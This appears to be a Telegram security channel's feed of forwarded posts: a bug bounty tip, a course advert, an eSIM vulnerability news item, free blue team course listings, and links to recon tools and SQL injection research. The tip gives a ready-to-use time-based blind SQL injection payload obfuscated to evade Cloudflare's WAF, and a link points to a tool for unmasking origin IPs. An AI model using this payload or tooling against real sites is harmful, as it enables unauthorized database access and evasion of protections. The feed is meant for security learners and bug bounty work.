Forwarded from Brut Security
🛡️ Bug Bounty Tip: Cloudflare 403 Bypass for Time-Based Blind SQLi
When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!
❌ Blocked Payload
(select(0)from(select(sleep(10)))v) → 403 Forbidden
✅ Bypass Payload
(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v)
🔍 This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.
✅Credit: @nav1n0x
Forwarded from Turan Security
Friends, we are announcing the news many of you have long awaited. The Turan Security cybersecurity organization has opened admissions to special cybersecurity courses based on real practice!
You will no longer have to wonder which training center to study at.
Learn offensive and defensive cybersecurity from the field's true experts. Experienced specialists with more than 7 years of experience and international certification will serve as mentors. In addition, practical classes will be organized by Turan Security specialists.
The students we admit:
In the general 2-month Foundation stage, they will gain specialized knowledge of basic IT fundamentals, networking and Linux administration.
💻 Students who successfully complete this stage will be given specialized practice-based knowledge over 6 months in two tracks, offensive (red team) and defensive (blue team) cybersecurity.
🔴 Red Team: In the offensive cybersecurity track, identifying vulnerabilities in an organization's websites, internal information systems and network systems. Knowledge is given on obtaining data by using the identified vulnerabilities and on how to prevent vulnerabilities.
🔵 Blue Team: In the defensive cybersecurity track, practical knowledge is given on preventing vulnerabilities identified in an organization's internal and external systems, detecting and analyzing cybersecurity incidents, and deploying and monitoring threat-detection systems.
Those who wish to study should contact the admin for details!
🟦 🟦 🟦
@TuranSecurity | www.turansec.uz | [email protected]
https://medium.com/h7w/deep-recon-finding-secrets-in-javascript-with-deep-recon-99abb2c9ad85
If you do not have access, do it like this: https://freedium.cfd/URL
Medium
Deep Recon: Finding Secrets in JavaScript with Deep Recon
Combining Asset Discovery and JavaScript Internals to Uncover Hidden APIs, Features, and Vulnerabilities
If you have a web pentest task with Cloudflare, you can use it to find the original IP of the target. It will help you get more findings, good luck!
https://github.com/spyboy-productions/CloakQuest3r
Forwarded from Хакер — Xakep.RU
eSIM vulnerabilities allow cards to be cloned and users to be spied on
Researchers at AG Security Research have discovered vulnerabilities in the eSIM technology used in modern smartphones. The issues affect Kigen's eUICC software package, which is used by billions of devices.
https://xakep.ru/2025/07/14/esim-problems/
Forwarded from Cat Seclist
⭕Top Free Blue Team Courses to Boost Your Cybersecurity Skills
The demand for Blue Team professionals — those focused on defense, detection, and response — is growing fast. If you're starting or leveling up in cybersecurity, here are some of the best free resources to get hands-on and stay ahead:
🔹 Blue Team Level 1 – Security Blue Team
Intro to SOC, SIEM, threat detection, Windows/Linux forensics.
🌐 securityblue.team
🔹 CyberDefenders
Gamified labs for SOC, DFIR, SIEM, and threat hunting.
🌐 cyberdefenders.org
🔹 IBM Cybersecurity Analyst – Coursera
Foundations, network defense, SOC tools, and incident response.
🌐 coursera.org
🔹 TryHackMe – Cyber Defence Path
Labs on Blue Team, malware analysis, SIEM, and more.
🌐 tryhackme.com
🔹 DFIR Training
Free forensics and incident response resources.
🌐 dfir.training
🔹 MITRE ATT&CK Defender Training
Learn how to apply MITRE ATT&CK for real-world defense.
🌐 attack.mitre.org
🔹 EDX – Cybersecurity Fundamentals by RIT
Core concepts and defensive strategies.
🌐 edx.org
🎯 Bonus: Google Cybersecurity Certificate (Coursera – free w/ aid)
🌐 coursera.org
Forwarded from BugXplorer (j b)
A Novel Technique for SQL Injection in PDO’s Prepared Statements
https://slcyber.io/assetnote-security-research-center/a-novel-technique-for-sql-injection-in-pdos-prepared-statements/
🪳 @bugxplorer